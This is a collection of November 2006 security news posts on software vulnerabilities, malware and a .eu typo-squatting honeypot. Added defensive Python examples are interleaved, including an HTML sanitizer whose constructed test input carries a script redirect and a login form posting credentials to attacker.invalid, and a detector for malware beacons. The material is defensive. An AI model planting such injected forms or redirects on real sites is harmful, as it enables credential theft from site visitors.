November 2006 - Posts

New Adobe vulnerability (NEW)

Published: 2006-11-29,
Last Updated: 2006-11-29 18:34:37 UTC by Toby Kohlenberg (Version: 1)

Frank Klein has written to let us know that there are new vulnerabilities in Adobe Acrobat and Acrobat Reader that have the potential for code execution as a result of incorrect argument handling in the ActiveX control for Internet Explorer. There is no patch currently available; Adobe's suggested mitigation is to delete the control, and FrSIRT has published a kill bit you can set that should disable it.

The vulnerable versions are:
Adobe Standard, Reader & Professional 7.0.0 - 7.0.8

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

BuddyProfile used to spread exploits

Alright, back to the doom and gloom! ;)

A little background info: BuddyProfile is a site meant to let you spiff up your Buddy Profile for AOL Instant Messenger (AIM). It seems to be popular with a youngish teenage audience; it's in the top 100,000 sites according to Alexa. It's this particular fact which makes all the drama that follows that much more disturbing.

The basic problem is one we've seen before: when users are free to add their own HTML content with minimal restrictions, people will find a way to add objectionable content such as malware and adware.
A SiteAdvisor crawl today turned up some profiles on the site which immediately redirect the user to an adult site; that site points to a file detected as Exploit-ANIfile, which is being used to install Adware-PestTrap, which in turn displays "security warnings" to the user.
Just to recap:

  1. Popular site, frequented by a large number of kids
  2. Allows users to add their own HTML content
  3. HTML content is being used on profiles to redirect people browsing this site (presumably said kids) to porn and surreptitiously-installed adware programs

Yuck. Seriously.
I think one of our SiteAdvisor researchers, Harry Sverdlove, put it best. He likened sites allowing users to embed their own HTML content into profile pages to restaurants letting people bring in their own food to be served to everyone:

“I’ll take the salmonella and the botulism ‘to go’ please.”

Computer Security Research - McAfee Avert Labs Blog.

Backdoor Trojans significant and tangible threat to Windows users - MS Antimalware Team

Published: 2006-11-26,
Last Updated: 2006-11-26 17:04:40 UTC by Patrick Nolan (Version: 1)

Windows Malicious Software Removal Tool: Progress Made, Trends Observed is a paper published in early November by the Microsoft Antimalware Team giving a "perspective of the malware landscape based on the data collected by the MSRT". The tool, by default, "only looks for malware that are currently running or linked to through an auto-start point, such as in the registry."

Anyone with network security monitoring or malware IR responsibilities should consider giving it a read. Some highlights (ymmv) include:

"Backdoor Trojans" ... "are a significant and tangible threat to Windows users."

"Out of the 5.7 million computers cleaned, the MSRT has removed a backdoor Trojan from over 3.5 million (62%) of them." "Bots, a sub-category of backdoor Trojans" ... "represent a majority of the removals." Rbot, Sdbot, and Gaobot "compose three of the top five slots in terms of total number of removals."

"The increase in Win32/Rbot removals is due to a large number of variants of that malware family being added to the MSRT each release. On average, approximately 2,000 new variants of Win32/Rbot have been added to the tool each month."

Correlations in the paper:

"The largest correlation shown" ... "is between rootkits and backdoor Trojans. In approximately 20% of the cases in which a rootkit was found on a computer, at least one backdoor Trojan was found as well. This emphasizes the trend of a large number of rootkits being distributed or leveraged by backdoor Trojans." (handler emphasis/bold) "The percentages are also high between P2P worms and backdoor Trojans and IM worms and backdoor Trojans. The high values here are also expected given that many P2P worms and IM worms will often drop bots on the computer when they are run."

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Zero day Warezov
Posted by Mikko @ 09:52 GMT

We've been busy with the latest spam runs of the Warezov family over the last hours.

We've added detection for the following variants, and there are probably more on the way:



Updated to add: New domain - RXFF - See the list.

F-Secure : News from the Lab - November of 2006.


Reverse Cross-Site Request (RCSR) vulnerability (NEW)

Published: 2006-11-22,
Last Updated: 2006-11-22 14:43:18 UTC by Adrien de Beaupre (Version: 1)

A new vulnerability in Firefox has recently been disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites: the password manager fills a saved username and password into a login form based on the domain of the page it appears on, without checking where that form actually submits, so any site that lets users add their own content, such as blogs or any page requesting user input, can carry an injected form that sends the saved credentials elsewhere. The proof of concept page shows the username and password input ending up in a Google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears here. This type of attack vector appears to also affect Internet Explorer.

Bugzilla link.

Mozilla has apparently been advised of the vulnerability; there is currently no vendor patch. The workaround in this particular case would be to never let Firefox save passwords for any web site. The option is under Tools, Options, Security. Here is a link showing how to disable it.
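The client-side workaround above protects one user at a time. The site-side fix, for this entry and for the BuddyProfile entry earlier on this page, is to never let user-supplied HTML carry forms or active content at all: without a form there is nothing for the password manager to fill in, and without script, object, iframe or meta tags there is no redirect to an exploit page. The following whitelist sanitizer is an added example, not code from the ISC diary, Mozilla or McAfee; the sample profile markup is constructed, and the tag and attribute whitelists are my choice of a minimal set that still lets a profile be decorated.

```python
"""Whitelist sanitizer for user-supplied profile HTML (added example, constructed input)."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags a user may keep. Anything else is removed; its text content survives unless
# the tag is in DROP_WITH_CONTENT.
ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "img", "font",
                "div", "span", "ul", "ol", "li", "h1", "h2", "h3", "center"}
# Active content and plug-in hosts: removed together with their body.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "applet", "noscript"}
# form/input/button/select/textarea (what a password manager fills in), meta/link/base
# (redirects, URL rebasing) and embed (plug-ins) are simply not in ALLOWED_TAGS,
# so their tags vanish while any visible text remains.
ALLOWED_ATTRS = {"href", "src", "alt", "title", "color", "size", "face", "width", "height"}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}

_CTRL = re.compile(r"[\x00-\x20\x7f]")

def safe_url(value):
    """Return the URL if it is http(s) or relative, else None. Control characters and
    whitespace are stripped first so 'java\\tscript:' cannot sneak past the scheme check."""
    cleaned = _CTRL.sub("", value)
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if scheme in ("http", "https", "") else None

class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (tag, reason) so the site can log what users tried
        self._skip = 0      # > 0 while inside an element being removed with its body

    def handle_starttag(self, tag, attrs):
        if self._skip:
            if tag in DROP_WITH_CONTENT:
                self._skip += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.dropped.append((tag, "active content removed with body"))
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, "tag not in whitelist"))
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS or value is None:
                if name.startswith("on") or name == "style":
                    self.dropped.append((tag, "attribute %s removed" % name))
                continue
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    self.dropped.append((tag, "non-http %s removed" % name))
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if self._skip:
            if tag in DROP_WITH_CONTENT:
                self._skip -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) are dropped

def sanitize(user_html):
    """Return (clean_html, dropped_items)."""
    p = ProfileSanitizer()
    p.feed(user_html)
    p.close()
    return "".join(p.out), p.dropped

# Constructed sample: decoration plus the tricks described on this page
# (script redirect, meta refresh, an injected login form, a javascript: link, an event handler).
SAMPLE_PROFILE = (
    '<b>hi!</b> <a href="http://example.invalid/me">my page</a>'
    '<a href="javascript:alert(1)">click</a>'
    '<script>location="http://bad.invalid/x.ani"</script>'
    '<meta http-equiv="refresh" content="0;url=http://bad.invalid/">'
    '<form action="http://attacker.invalid/steal" method="post">'
    '<input name="username"><input name="password" type="password">'
    '<input type="submit" value="login"></form>'
    '<img src="x" onerror="alert(1)">'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_PROFILE)
    print(clean)
    for item in dropped:
        print("dropped:", item)
```

The parser is a whitelist, not a blacklist: an unknown tag is removed by default, so a new browser feature never becomes an exploit vector by omission. Everything the page shows a browser (text and attribute values) is re-escaped on output, and the `dropped` list gives the site a record of who is uploading forms and scripts.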

Thanks to our reader Carsten for letting us know.

Adrien de Beaupre

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Time to get patching!!

“Microsoft is aware of public proof of concept code targeting the vulnerability addressed by security update MS06-070. At this time Microsoft has not seen any indications of active exploitation of the vulnerability. Microsoft has activated its emergency response process and is continuing to investigate this public report.

Microsoft continues to recommend that customers apply the November updates as soon as possible with additional urgency and consideration given to the update detailed in MS06-070. Customers can ensure that the updates are being installed by enabling the Automatic Updates feature in Windows or by using their deployment infrastructure in their enterprise or small business.”


Title: Microsoft Security Advisory Notification

Issued: November 16, 2006


Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (928604)

- Title: Exploit Code Published Affecting the Workstation Service on Windows 2000


- Revision Note: Advisory published.



This detection covers exploits targeting a WinZip FileView ActiveX Control vulnerability that can result in the execution of arbitrary code.

As this threat uses script to carry out exploitation, VirusScan's ScriptScan component, or a gateway scanner, is required for the DAT files to offer protection from this threat. Identification is available via other DAT-consuming scanners.

For more details on the vulnerability that is exploited by this threat, see:


Discovered: November 16, 2006
Updated: November 16, 2006 11:23:20 AM PST
Type: Trojan Horse, Virus, Worm
Systems Affected: Windows 2000, Windows XP
CVE References: CVE-2006-4691

Bloodhound.Exploit.99 is a heuristic detection for the Microsoft Windows Workstation Service Could Allow Remote Code Execution Vulnerability, (as described in Microsoft Security Bulletin MS06-070).

Bloodhound.Exploit.99 -

Honeypot Mirroring .edu domains under .eu / Active Threat (NEW)

Published: 2006-11-16,
Last Updated: 2006-11-16 20:50:04 UTC by John Bambenek (Version: 1)


The .eu top-level domain is relatively new and still in its build-up phase, and a co-worker noticed something fun.

When ssh'ing to a local server, he typo'd the DNS name and finished it with .eu instead of .edu. It connected with an SSH handshake (it was a new server, so the host key warning wasn't considered a big deal) and took a password. He immediately recognized the problem when the password wasn't accepted, and we investigated.

It appears any DNS name under that .eu domain would resolve to this machine. Not only that, but the machine in question was hosting at least 7 other domains under .eu that would map to an educational institution. For instance, for the "fake" educational institution at you could search for and get a response pointing to this machine.

response: (good)

response: (bad)

nslookup (XXX = anything whether or not it exists on the .edu side)
response: (bad)

It appears that this machine will take any name under certain domains and resolve it, whether or not the DNS name actually exists on your end (i.e. a wildcard record).

What it appears, for the moment, is that this machine is running a honeypot to capture passwords from people who typo .edu as .eu. However, with a little ingenuity they could turn this enterprise into something truly evil. Right now it is only running a few token services and the web page appears to be hosting "non-content". There are some who think this is "legit".

With these main .edu domains all pointing to the same place, a box with non-content, I'm not buying it. Incidents like this are a good reason to be cautious, particularly when the mitigation is as uninvolved as it is.


Check your .edu to see if it also resolves as .eu (i.e. nslookup the .eu equivalent of your host names and see what happens).

If you get, they are mirroring your .edu.

Filter that IP in both directions and pursue what other avenues your lawyers think necessary (i.e. lock down the .eu equivalent of your domain).
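The three steps above can be scripted so every host name in your .edu zone is checked, including the "nslookup XXX" wildcard test. The following is an added example, not part of the ISC diary; the resolver is injected as a function so the logic can be exercised against canned answers offline, and the status strings and function names are my own. The sample IPs in the usage below are documentation-range addresses, not the box from the diary.

```python
"""Check whether the .eu look-alike of each .edu host name resolves, and whether the
.eu zone is a wildcard (answers for names that cannot exist). Added example."""
import secrets
import socket
import sys

def system_resolve(name):
    """IPv4 addresses for name via the system resolver; empty set if it does not resolve."""
    try:
        return set(socket.gethostbyname_ex(name)[2])
    except (socket.gaierror, socket.herror, UnicodeError):
        return set()

def lookalike(hostname, old_tld=".edu", new_tld=".eu"):
    """www.example.edu -> www.example.eu"""
    if not hostname.lower().endswith(old_tld):
        raise ValueError("expected a %s name, got %r" % (old_tld, hostname))
    return hostname[:-len(old_tld)] + new_tld

def registered_zone(hostname):
    """Last two labels, e.g. example.eu, which is where a wildcard record would live."""
    return ".".join(hostname.split(".")[-2:])

def check_eu_mirror(hostnames, resolve=system_resolve):
    """One finding per host: does the .eu twin resolve, to whom, and is the zone a wildcard?"""
    findings = []
    for host in hostnames:
        eu_name = lookalike(host)
        edu_ips, eu_ips = resolve(host), resolve(eu_name)
        finding = {"host": host, "eu_name": eu_name,
                   "edu_ips": sorted(edu_ips), "eu_ips": sorted(eu_ips)}
        if not eu_ips:
            finding["status"] = "not resolving"
            findings.append(finding)
            continue
        # The diary's "nslookup XXX" test: a random label that cannot exist on the .edu side.
        probe = secrets.token_hex(6) + "." + registered_zone(eu_name)
        finding["wildcard"] = bool(resolve(probe))
        finding["same_as_edu"] = edu_ips == eu_ips
        if finding["same_as_edu"]:
            finding["status"] = "resolves to your own addresses"
        elif finding["wildcard"]:
            finding["status"] = "wildcard zone, likely mirror or typo-squat"
        else:
            finding["status"] = "resolves elsewhere, no wildcard"
        findings.append(finding)
    return findings

if __name__ == "__main__":
    # Usage: python check_eu.py www.example.edu mail.example.edu ...
    for f in check_eu_mirror(sys.argv[1:]):
        print(f)
```

The `eu_ips` in a "wildcard zone" finding are the addresses to filter in both directions; the "resolves to your own addresses" case is what you want to see after you register the .eu equivalent yourself. The SSH half of the story has its own lesson: a host key warning on a name you have typed by hand is exactly the situation it exists for, new server or not.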

I'm interested in how wide-spread this is, and would like a report if your .edu is affected.

John Bambenek
bambenek /at/ gmail [dot] com

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Microsoft patches 11 critical vulnerabilities, one worm candidate

This month, Microsoft has patched 13 vulnerabilities. Among them is one that can be used to create a worm targeting Windows 2000 systems: the MS06-070 Workstation Service vulnerability can be remotely exploited without user interaction, and on Windows 2000 no authentication is needed when sending traffic to this service. Details on this vulnerability have been published.
The vulnerabilities in the Internet Explorer DirectAnimation.PathControl ActiveX object and in XML Core Services, both exploited in the wild, have been addressed in this month's patch cycle.
The update of our graphs from last month is found below. The graphs show that Microsoft is continuing the trend of patching a large number of critical vulnerabilities each month.
[Graphs: Critical vulnerabilities addressed by Microsoft; Important vulnerabilities addressed by Microsoft]

Computer Security Research - McAfee Avert Labs Blog.


Title: Microsoft Security Bulletin Minor Revisions

Issued: November 16, 2006

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

Bulletin Information:

- Reason for revision: Bulletin revised to call out Microsoft Windows XP Professional x64 Edition as affected software.
- Updated: November 15, 2006
- Bulletin Severity Rating: Critical
- Version: 1.1

- Reason for revision: Bulletin revised to clarify that this security update installs Flash6.ocx version and removes the version of Flash.ocx it is replacing.
- Updated: November 15, 2006
- Bulletin Severity Rating: Critical
- Version: 1.1

- Reason for revision: Executable name for msxml6 has been updated with correct name and log file has been updated with correct KB number. Additional clarification has also been added to clarify which components of the previous Bulletin this update replaces.
- Updated: November 15, 2006
- Bulletin Severity Rating: Critical
- Version: 1.1


The 2007 Botnet Package - 0-day + Parasite + Google ?

On Sunday November 5th, we blogged about a 0-day exploit discovered in the wild that was targeting a Microsoft XML Core Services vulnerability. McAfee Avert Labs had been tracking and monitoring the payload deployed by this exploit.

W32/Kibik.a was the detection name assigned on Sunday, which was soon included in the McAfee VirusScan DAT release the following week. With rootkit heuristics, behavioral detection and IP blacklists being the talk of the (security) town in recent years, W32/Kibik.a makes an interesting attempt to survive in this competitive matrix of today.

W32/Kibik.a is a parasite that attaches to Windows Explorer (explorer.exe), even covering the backup copies of explorer.exe in the System Restore, service pack installation and Windows Installer folders, making it hard for victims to restore the original system file. In the process list, explorer.exe has its perfectly legitimate presence; on disk, the infected explorer.exe is no different in file size because W32/Kibik.a attaches to unused segments in the original file. Behavioral detection products looking for rootkit characteristics or autorun registry keys will find nothing, because there isn't any rootkit or autorun key.
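The "unused segments" a file infector can use without changing the file size are the padding between a section's VirtualSize and its SizeOfRawData, which a linker fills with zeros. The following is an added example of checking for that, not McAfee's detection logic and not an analysis of W32/Kibik.a itself: a minimal PE section-table parser, a scan that reports sections whose on-disk padding contains non-zero bytes or holds the entry point, and a constructed PE32 image (not a real Windows binary) used as test input. The heuristic is mine; treat a hit as a reason to compare the file against a known-good hash of the same version, not as proof of infection.

```python
"""Heuristic check for code hidden in PE section slack (added example, not McAfee's detection)."""
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000

def parse_pe(pe):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image held in memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                 # optional header follows the 20-byte COFF header
    entry = struct.unpack_from("<I", pe, opt + 16)[0]   # AddressOfEntryPoint, same offset in PE32 and PE32+
    table = opt + opt_size
    sections = []
    for i in range(nsections):
        off = table + 40 * i                            # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "rawptr": rawptr, "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
    return entry, sections

def scan_slack(pe):
    """List sections whose on-disk padding holds non-zero bytes or the entry point.
    Clean linker output pads with zeros, so either condition deserves a closer look."""
    entry, sections = parse_pe(pe)
    findings = []
    for s in sections:
        if s["rawsize"] <= s["vsize"]:
            continue
        start, end = s["rawptr"] + s["vsize"], s["rawptr"] + s["rawsize"]
        nonzero = sum(1 for b in pe[start:end] if b)
        entry_in_slack = s["vaddr"] + s["vsize"] <= entry < s["vaddr"] + s["rawsize"]
        if nonzero or entry_in_slack:
            findings.append({"section": s["name"], "exec": s["exec"],
                             "slack_bytes": end - start, "nonzero_slack_bytes": nonzero,
                             "entry_in_slack": entry_in_slack, "file_offset": start})
    return findings

def build_sample_pe(cave=b"", entry_rva=None):
    """Constructed test image (not a real Windows binary): one .text section whose raw
    size (0x200) exceeds its virtual size (0x40). `cave` is written into that padding
    the way a file infector would; entry_rva lets a test point the entry point at it."""
    e_lfanew, opt_size = 0x40, 224
    vsize, vaddr, rawsize, rawptr = 0x40, 0x1000, 0x200, 0x200
    if len(cave) > rawsize - vsize:
        raise ValueError("cave larger than the section slack")
    hdr = bytearray(rawptr)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # COFF header: Machine=i386, 1 section, timestamp, symtab ptr, nsyms, opt size, characteristics
    struct.pack_into("<HHIIIHH", hdr, e_lfanew + 4, 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = e_lfanew + 24
    struct.pack_into("<H", hdr, opt, 0x10B)                      # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, vaddr if entry_rva is None else entry_rva)
    struct.pack_into("<8sIIIIIIHHI", hdr, opt + opt_size, b".text", vsize, vaddr,
                     rawsize, rawptr, 0, 0, 0, 0, 0x60000020)   # CODE | EXECUTE | READ
    body = bytearray(rawsize)
    body[:vsize] = b"\x90" * (vsize - 1) + b"\xC3"               # stand-in code: NOPs then RET
    body[vsize:vsize + len(cave)] = cave
    return bytes(hdr + body)

def scan_file(path):
    with open(path, "rb") as f:
        return scan_slack(f.read())

if __name__ == "__main__":
    # Usage: python pe_slack.py C:\Windows\explorer.exe   (no argument: scan the constructed sample)
    if len(sys.argv) > 1:
        results = scan_file(sys.argv[1])
    else:
        results = scan_slack(build_sample_pe(b"\xE8" + b"\x00" * 4 + b"\x90" * 20))
    for r in results:
        print(r)
```

Because the infector also overwrites the backup copies the post mentions, comparing the live file against those copies proves nothing; compare against a hash taken from install media or a vendor catalog instead.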

To make it even more difficult for network administrators to track, W32/Kibik.a sends innocent-looking search requests to Google Blogsearch; only the search keywords, unique hexadecimal strings, give it away. Google Blogsearch, unlike the Google Web Search we are most familiar with, indexes blog entries through the RSS and Atom feeds blog authors publish, which makes new blog content searchable much sooner than it would be through Web search. Once the author's posts are indexed, the search results can return dynamic data, such as URLs to download or commands to execute, to every infected machine in a synchronized manner. At the time of writing, W32/Kibik.a's searches have not yielded any results.
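A channel like this is quiet on the wire but not invisible in a proxy log: a normal person does not search Blogsearch for a 20-character hex string, let alone several different ones. The following detection is an added example, not McAfee's; the log lines are constructed in a generic "timestamp client method url status" layout, and the assumption that the keyword travels in the `q=` parameter (as an ordinary Blogsearch query does) is mine.

```python
"""Flag proxy clients issuing Google Blogsearch queries whose keyword is only a long hex
string, the beaconing pattern described above (added example, constructed log lines)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

HEX_TOKEN = re.compile(r"^[0-9a-f]{16,}$", re.I)
# Constructed proxy log layout: "<timestamp> <client> <method> <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})")

def blogsearch_hex_query(url):
    """Return the lower-cased hex token if url is a Blogsearch query for one, else None."""
    u = urlsplit(url)
    if (u.hostname or "").lower() != "blogsearch.google.com":
        return None
    for q in parse_qs(u.query).get("q", []):
        if HEX_TOKEN.match(q.strip()):
            return q.strip().lower()
    return None

def find_beacons(lines, min_distinct=3):
    """Map client -> sorted hex tokens for clients with at least min_distinct different
    hex-only Blogsearch queries. One hash looked up by a human is noise; a host cycling
    through several unique tokens is the pattern worth an alert."""
    per_client = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        token = blogsearch_hex_query(m.group("url"))
        if token:
            per_client[m.group("client")].add(token)
    return {c: sorted(t) for c, t in per_client.items() if len(t) >= min_distinct}

# Constructed sample: 10.0.0.5 beacons three times, 10.0.0.9 is a person who also
# looked one hash up on Web search (not Blogsearch) and once on Blogsearch.
SAMPLE_LOG = """\
2006-11-15T10:01:03Z 10.0.0.5 GET http://blogsearch.google.com/blogsearch?hl=en&q=3f9a1c7e4b2d8a60e5f1 200
2006-11-15T10:01:04Z 10.0.0.9 GET http://blogsearch.google.com/blogsearch?hl=en&q=cat+pictures 200
2006-11-15T10:31:07Z 10.0.0.5 GET http://blogsearch.google.com/blogsearch_feeds?q=b77e02aa19c4d3f8e6a5&output=rss 200
2006-11-15T10:40:11Z 10.0.0.9 GET http://www.google.com/search?q=3f9a1c7e4b2d8a60e5f1 200
2006-11-15T11:01:09Z 10.0.0.5 GET http://blogsearch.google.com/blogsearch?hl=en&q=09ce54d1a7b3f6e28c40 200
2006-11-15T11:02:00Z 10.0.0.9 GET http://blogsearch.google.com/blogsearch?hl=en&q=deadbeefcafef00d1234 200
"""

if __name__ == "__main__":
    for client, tokens in find_beacons(SAMPLE_LOG.splitlines()).items():
        print(client, tokens)
```

The distinct-token threshold is what keeps this usable: it turns "someone searched for a hash" into "this host keeps searching for fresh hashes", which is the behaviour of a bot polling for orders rather than a user.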

From silent installation via a 0-day exploit, to silent residence and operation, to virtually silent and innocent-looking Google searches, W32/Kibik.a could well be the start of a new trend in scalable remotely controlled malware (a.k.a. botnets) in 2007. Given its stealthy elements, it is no wonder that few security vendors have detected or repaired W32/Kibik.a to date.

McAfee Avert Labs continues to monitor W32/Kibik.a and other malware using these techniques.

Virus Total Results 11.15.2006

Computer Security Research - McAfee Avert Labs Blog.

Critical security vulnerability in WinZip 10 (NEW)

Published: 2006-11-15,
Last Updated: 2006-11-15 09:40:27 UTC by Bojan Zdrnja (Version: 2)

WinZip Computing released a new build of WinZip 10 that fixes a critical security vulnerability in this popular ZIP program.

The vulnerability exists in an ActiveX component that is shipped with WinZip 10 only (so if you are running previous versions of WinZip you are not affected by this vulnerability). This ActiveX component is marked safe for scripting which means that a remote attacker can exploit it if you visit a web page hosting the exploit.

Build 7245 of WinZip 10 is available for download. If you, for some reason, cannot upgrade, you should disable the affected ActiveX control (WZFILEVIEW.FileViewCtrl.61) by setting its kill bit; its CLSID is A09AE68F-B14D-43ED-B713-BA413F034904.


MS06-067 also mitigates this vulnerability: besides the other things that update does, it sets the kill bits for the vulnerable ActiveX components.
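Both the Adobe entry at the top of this page and this WinZip entry come down to the same mitigation: set the kill bit so Internet Explorer refuses to instantiate the control, whether or not it is still installed. The following is an added example, not code from the ISC diary or from WinZip, Adobe or Microsoft. It writes a .reg file for a list of CLSIDs, using the WinZip FileView CLSID quoted above as the sample (for Acrobat, pass the CLSID from the vendor or FrSIRT advisory, which this page does not give), and decodes a "Compatibility Flags" value read back from the registry. The registry path and the 0x400 bit are the documented ActiveX Compatibility mechanism; the function names are mine.

```python
"""Build a .reg file that sets the ActiveX kill bit for one or more CLSIDs, and decode
"Compatibility Flags" values read back from the registry. Added example."""
import re

# Per-CLSID policy lives under this key; the 0x400 bit in "Compatibility Flags" tells
# Internet Explorer never to instantiate the control.
KILLBIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KILL_BIT = 0x00000400

# CLSID quoted in the WinZip diary entry above (WZFILEVIEW.FileViewCtrl.61).
WINZIP_FILEVIEW_CLSID = "A09AE68F-B14D-43ED-B713-BA413F034904"

_CLSID_RE = re.compile(r"^\{?[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}?$", re.I)

def normalize_clsid(clsid):
    """Upper-case, brace-wrapped form used as the registry subkey name."""
    if not _CLSID_RE.match(clsid):
        raise ValueError("not a CLSID: %r" % clsid)
    return "{" + clsid.strip("{}").upper() + "}"

def flags_with_killbit(existing):
    """OR the kill bit into whatever flags are already set (None = no value yet)."""
    return (existing or 0) | KILL_BIT

def is_killed(flags):
    """True when the 0x400 bit is set in a "Compatibility Flags" DWORD."""
    return flags is not None and bool(flags & KILL_BIT)

def killbit_reg(clsids, existing=None):
    """Return the text of a REGEDIT5 .reg file setting the kill bit for each CLSID.
    `existing` maps CLSID -> current flags, so other compatibility bits already set on a
    control are preserved instead of being clobbered by a bare dword:00000400."""
    existing = {normalize_clsid(k): v for k, v in (existing or {}).items()}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        key = normalize_clsid(clsid)
        lines.append("[%s\\%s]" % (KILLBIT_KEY, key))
        lines.append('"Compatibility Flags"=dword:%08x' % flags_with_killbit(existing.get(key)))
        lines.append("")
    return "\r\n".join(lines)

def read_flags(clsid):
    """Read the live value on Windows; None off Windows, or when no value exists."""
    try:
        import winreg
    except ImportError:
        return None
    sub = KILLBIT_KEY.split("\\", 1)[1] + "\\" + normalize_clsid(clsid)
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub) as k:
            value, kind = winreg.QueryValueEx(k, "Compatibility Flags")
            return value if kind == winreg.REG_DWORD else None
    except OSError:
        return None

if __name__ == "__main__":
    # Usage: python killbit.py > killbits.reg ; then regedit /s killbits.reg on each machine.
    current = {WINZIP_FILEVIEW_CLSID: read_flags(WINZIP_FILEVIEW_CLSID)}
    print(killbit_reg([WINZIP_FILEVIEW_CLSID], current), end="")
    print("already killed:", is_killed(current[WINZIP_FILEVIEW_CLSID]))
```

Two practical notes: the kill bit works even after the control's DLL has been deleted, which is why it is the durable fix, and on a 64-bit Windows the 32-bit IE reads the same key under SOFTWARE\Wow6432Node, so the file should be written for both paths there.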

Thanks to Carl for spotting this.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System


W32/Realor.worm - Infecting Movies for Fun and Profit

After Exploit-WMF and the umpteen image file format exploits that followed, general computer users should understand that a file not bearing the extension *.EXE is not necessarily safe to view. Malware crafted out of document and media file formats is nothing new, nor is it a threat unique to Windows users. Before Word document 0-days made it into mainstream news headlines, there were text file exploits. More recently there was Exploit-WinAmpPLS playing a spyware note, and today a Microsoft security advisory for five critical Flash Player vulnerabilities, as the music plays on.

Today, McAfee Avert Labs discovered W32/Realor.worm in the wild, actively modifying all RealMedia (*.rmvb) files in its path. These "infected" media files launch a malicious web page without prompting while the user views them in RealPlayer. The files can be music or videos hosted on a network drive of corporate presentations, a personal media server, a P2P shared folder, et cetera. When was the last time you hesitated before opening a movie file?

As much as the new world of broadband multimedia presents new channels for entertainment and business opportunities, it is as attractive a breeding ground for malware as any other popular application. Whether through a worm, using tools or hand-crafted, media files are a penetration vector hard to resist for profiteering malware authors. McAfee Avert Labs recognises a rising trend in the manipulation of media files to embed or install malware. Heuristics and generic detection such as New Downloader.b and Generic are only some of the proactive measures to block such attempts. Internet users are advised to be cautious about sharing media files in a publicly writable folder or viewing media files from unknown sources, as you would with unsolicited e-mails and *.EXE files.

Computer Security Research - McAfee Avert Labs Blog.
